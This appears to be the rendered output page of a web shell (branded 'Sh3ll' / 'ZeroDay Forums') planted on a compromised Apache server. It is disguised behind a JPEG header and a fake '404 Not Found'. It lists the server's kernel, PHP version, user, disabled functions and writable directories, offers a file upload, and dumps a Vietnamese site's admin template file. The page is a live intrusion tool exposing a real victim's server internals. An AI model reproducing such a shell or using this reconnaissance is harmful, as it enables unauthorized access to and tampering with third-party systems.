����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkewebvumi.com/admin_new/skin/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/thietkewebvumi.com/admin_new/skin/admin/videocat.tpl
<h4 class="alert_info">

    <form name="search" id="search" action="" method="post">
        <table cellspacing="1" width="100%"  >
            <tr>

                <td class="row">

                    T.trạng :
                    <select name="fstatus" id="fstatus">
                        <option value="2">Tất cả</option>
                        <option value="1">Đang kích hoạt</option>
                        <option value="0">Chưa kích hoạt</option>
                    </select>
                    Tên :
                    <input type="text" name="fkeyword" value="" size="20" maxlength="255">
                    <input name="bsubmit" type="submit" id="bsubmit" value="  Xem  " />
                </td>
            </tr>
            {if $nsearch == 1}
            <tr><td><input name="huy" type="button" id="huy" value="  Hủy tìm kiếm  " onclick="window.location.href='index.php?act=video&nosearch'" /></td></tr>{/if}
        </table>
    </form>

</h4>
{if $status == 'del_success'}
<h4 class="alert_success">Xóa danh mục thành công</h4>
{/if}
{if $status == 'add_success'}
<h4 class="alert_success">Thêm danh mục thành công</h4>
{/if}
{if $status == 'edit_success'}
<h4 class="alert_success">Sửa danh mục thành công</h4>
{/if}
{if $section == 'list'}
<script language="javascript" type="text/javascript">
    function getGo(action)
    {
        if(action=='reorder') document.getElementById('task').value = 'reorder';
        if(action=='active') document.getElementById('task').value = 'activate';
        if(action=='deactive') document.getElementById('task').value = 'deactivate';
        if(action=='massdel'){
            if(confirm('Bạn có chắc muốn xóa ?')){
                document.getElementById('task').value = 'massdel';
            }else{
                return false;
            }
        }
        for(var i = 1; i <=parseInt('{$total}'); i++) // for(i = 0; i <=parseInt('[list.#;noerr]'); i++){
        {
            if(document.getElementById('u_'+i).checked==true)
            {
                document.getElementById('sids').value += document.getElementById('u_'+i).value + '|';
            }
        }
        return true;
    }
</script>
<article class="module width_full">
    <header><h3 class="tabs_involved"><a href="javascript:void(0);" onclick="get_mid();">Xóa</a> | <a href="index.php?act=movie&code=post">Thêm mới</a></h3></header>
    <input type="checkbox" name="all" id="checkall" /> Check all


    <div class="tab_container">

        <form action="index.php" method="post" name="post" id="form1">
            <input type="hidden" name="act" value="videocat">
        <div id="tab1" class="tab_content">
            <a name="phim"></a>
            <table class="tablesorter" cellspacing="0">
                <thead>
                <tr>
                    <th> </th>
                    <th>Tên</th>
                    <th>Tên Youtube</th>
                    <th>Edit</th>

                </tr>
                </thead>


                <tbody>


                {if $list}
                    {foreach from=$list key=k item=movie}
                <tr>
                    <td>
                        <input type="checkbox" name="u_{$k+1}" id="u_{$k+1}" value="{$movie.cid}" />

                    <td><a href="index.php?act=videocat&code=post&id={$movie.cid}" target="_blank">{$movie.cname}</a></td>
                    <td>{$movie.cname_youtube}</td>

                    <td><a href="index.php?act=videocat&code=post&id={$movie.cid}" target="_blank"><img src="skin/{$skin_folder_admin}/images/icn_edit.png" title="Edit"></a> </td>
                </tr>
                    {/foreach}
                {/if}

                </tbody>

            </table>
            <div class="spacer"></div>
            <div align="center">{$nav|html_entity_decode}</div>
            <div class="spacer"></div>
        </div>
            <table cellspacing="0" cellpadding="0" width="100%" class="aTable">
                <tr>

                    <td class="aRow" align="right">Đánh dấu các ô chọn  bên phải rồi :
                        <input type="hidden" name="sids" id="sids" value="">
                        <input type="hidden" name="task" id="task" value="" />

                        <input type="submit" value="Xóa" id="bmassdel" onclick="return getGo('massdel')"/>
                    </td>
                </tr>
            </table>
        </form>

    </div><!-- end of .tab_container -->

</article><!-- end of content manager article -->
    {literal}
    <script type="text/javascript">
        $('#checkall:checkbox').change(function () {
            if($(this).attr("checked")) $('input:checkbox').attr('checked','checked');
            else $('input:checkbox').removeAttr('checked');
        });
    </script>
    {/literal}
{/if}


{if $section == 'post'}
<article class="module width_full">
    <header><h3>Nhập video</h3></header>
    <form name="post" action="index.php?act=videocat&code=post" method="post">
    <div class="module_content">
        <fieldset>
            <label>Tiêu đề</label>
            <input type="text" value="{$post.cname}" name="cname" />
        </fieldset>
        <fieldset>
            <label>Youtube</label>
            <input name="cname_youtube" type="text" value="{$post.cname_youtube}" />
        </fieldset>





    </div>
    <footer>
        <div class="submit_link">
            <input type="hidden" name="cid" value="{$post.cid}" />
            <input type="submit" name="bsubmit" value=" Lưu " />


        </div>
    </footer>

  </form>
</article><!-- end of post new article -->

{/if}

ZeroDay Forums Mini